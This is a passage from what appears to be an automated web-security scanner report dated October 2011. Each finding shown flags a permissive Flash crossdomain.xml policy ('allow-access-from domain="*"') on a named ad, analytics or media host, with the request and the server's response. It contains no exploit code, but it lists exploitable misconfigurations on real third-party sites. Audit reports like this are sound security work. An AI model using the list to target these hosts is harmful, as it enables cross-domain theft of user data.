Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t2.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8dd9956cd874cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 18986
Date: Mon, 03 Oct 2011 01:02:37 GMT
Last-Modified: Sat, 17 Sep 2011 01:23:37 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.23. http://ecn.t3.tiles.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t3.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t3.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8dd9956cd874cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 179286
Date: Mon, 03 Oct 2011 01:02:31 GMT
Last-Modified: Sat, 17 Sep 2011 01:23:37 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.24. http://ehg-twi.hitbox.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ehg-twi.hitbox.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ehg-twi.hitbox.com

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:49:17 GMT
Server: Hitbox Gateway 9.3.6-rc1
Connection: close
Cache-Control: max-age=3600, private, proxy-revalidate
Expires: Mon, 03 Oct 2011 00:49:17 GMT
Content-Type: text/xml
Content-Length: 93

<cross-domain-policy>
   <allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

5.25. http://ff.connextra.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ff.connextra.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ff.connextra.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
ETag: W/"185-1316505216000"
Last-Modified: Tue, 20 Sep 2011 07:53:36 GMT
Content-Type: application/xml
Content-Length: 185
Date: Sun, 02 Oct 2011 23:50:54 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="ff.connextra.com" />
<allow-access-from domain="dd.connextra.com" />
<allow-access-from domain="*" />
</cross-domain-policy>

5.26. http://hits.guardian.co.uk/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.guardian.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: hits.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:01 GMT
Server: Omniture DC/2.0.0
xserver: www63
Content-Length: 137
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

5.27. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:51:32 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.28. http://idpix.media6degrees.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://idpix.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idpix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Sun, 02 Oct 2011 23:50:12 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.29. http://js.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sun, 02 Oct 2011 23:48:52 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.30. http://kantarmedia.guardian.co.uk/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://kantarmedia.guardian.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: kantarmedia.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 10 Jan 2008 16:02:57 GMT
ETag: "39dd8a-d0-4436057df0e40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

5.31. http://l.betrad.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.betrad.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=315360000, public
Content-Type: application/xml
Date: Sun, 02 Oct 2011 23:51:50 GMT
ETag: "4e4ab204=cf"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Last-Modified: Tue, 16 Aug 2011 18:08:04 GMT
Server: Cherokee
Content-Length: 207
Connection: Close

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-p
...[SNIP]...

5.32. http://m.xp1.ru4.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:50:18 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:05 GMT
Content-length: 202
Etag: "ca-4ceae155"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.33. http://media.fastclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:12 GMT
Server: Apache/2.2.4 (Unix)
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVo TAIo PSAo HISo OTPo OUR DELo BUS COM NAV INT DSP COR"
Content-Length: 202
Keep-Alive: timeout=5, max=19977
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.34. http://oas.guardian.co.uk/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://oas.guardian.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oas.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 10 Jan 2008 16:02:57 GMT
ETag: "23678b-d0-4436057df0e40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

5.35. http://openx.px.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://openx.px.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: openx.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 02 Oct 2011 23:52:30 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.36. http://panel.kantarmedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://panel.kantarmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: panel.kantarmedia.com

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 10 Jan 2008 16:02:57 GMT
ETag: "ff605-d0-4436057df0e40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

5.37. http://pix04.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sun, 02 Oct 2011 23:50:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.38. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 03 Oct 2011 23:48:53 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sun, 02 Oct 2011 23:48:53 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

5.39. http://premiumtv.122.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://premiumtv.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: premiumtv.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:17 GMT
Server: Omniture DC/2.0.0
xserver: www42
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

5.40. http://r.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 02 Oct 2011 23:49:38 GMT
Content-Type: text/xml;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:49:37 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

5.41. http://rs.gwallet.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rs.gwallet.com

Response

HTTP/1.0 200 OK
Content-Length: 207
Server: radiumone/1.2
Content-type: text/xml; charset=UTF-8
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-
...[SNIP]...

5.42. http://s0.2mdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 02 Oct 2011 08:47:55 GMT
Expires: Fri, 30 Sep 2011 06:56:37 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 54283
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.43. http://secure-uk.imrworldwide.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-uk.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-uk.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 02 Oct 2011 23:51:44 GMT
Content-Type: text/xml
Content-Length: 268
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
Connection: close
Expires: Sun, 09 Oct 2011 23:51:44 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

5.44. https://secure.mlb.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mlb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and uses a wildcard to specify allowed domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure.mlb.com

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:22 GMT
Cache-control: max-age=60
Edge-control: max-age=60
Content-type: text/xml
Last-modified: Tue, 18 Jan 2011 20:14:01 GMT
Content-length: 428
Etag: "1ac-4d35f489"
Accept-ranges: bytes
Connection: keep-alive

<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-access-from domain="*.mlb.com" secure="false" />
   <allow-http-request-headers-from domain="*.mlb.com" headers="*" secure="false"/>
   <site
...[SNIP]...

5.45. http://serve.williamhill.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://serve.williamhill.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: serve.williamhill.com

Response

HTTP/1.1 200 OK
ETag: W/"204-1301398816000"
Last-Modified: Tue, 29 Mar 2011 11:40:16 GMT
Content-Type: application/xml
Content-Length: 204
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

5.46. http://servedby.flashtalking.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: servedby.flashtalking.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Date: Sun, 02 Oct 2011 23:51:44 GMT
Server: Jetty(6.1.22)
Content-Type: application/xml
Via: 1.0 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Content-Length: 540

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.47. http://speed.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:527"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Sun, 02 Oct 2011 23:49:49 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

5.48. http://stat.flashtalking.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://stat.flashtalking.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: stat.flashtalking.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "0580c1d81e1acfe994df99be827cb0c3:1279561426"
Last-Modified: Mon, 19 Jul 2010 17:43:46 GMT
Accept-Ranges: bytes
Content-Length: 253
Content-Type: application/xml
Date: Sun, 02 Oct 2011 23:53:33 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://a.flashtalking.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.49. http://sync.mathtag.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x1 pid 0x2317 8983
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

5.50. http://tags.bluekai.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Sun, 02 Oct 2011 23:50:19 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 06 Jul 2011 22:45:14 GMT
ETag: "8db82c0-ca-4a76e5a88d280"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

5.51. http://vox-static.liverail.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://vox-static.liverail.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vox-static.liverail.com

Response

HTTP/1.0 200 OK
x-amz-id-2: 3sebe0ISz1GFs6/hvk4dqs1hU1eLmkoo5AIw0djnmKp3YLF6a3gCmXnpbbO5MTe8
x-amz-request-id: 90FA83FA648BCA9A
x-amz-meta-s3fox-filesize: 274
x-amz-meta-s3fox-modifiedtime: 1267129495540
Last-Modified: Thu, 25 Feb 2010 20:27:58 GMT
ETag: "1f663267210f6e5843980e9159b0b9ae"
Content-Type: text/xml
Content-Length: 274
Server: AmazonS3
Date: Sun, 02 Oct 2011 23:51:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.52. http://www.luminate.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.luminate.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.luminate.com

Response

HTTP/1.0 200 OK
Date: Sun, 02 Oct 2011 23:30:51 GMT
Server: Apache
Last-Modified: Tue, 02 Aug 2011 01:04:02 GMT
Accept-Ranges: bytes
Content-Length: 273
Content-Type: application/xml
Age: 1305
X-Cache: HIT from lb2-sv.int.pixazza.com
X-Cache-Lookup: HIT from lb2-sv.int.pixazza.com:80
Via: 1.0 lb2-sv.int.pixazza.com:80 (squid/2.6.STABLE18)
Connection: Keep-Alive

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*"/>
<site-contro
...[SNIP]...

5.53. http://www.manutd.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.

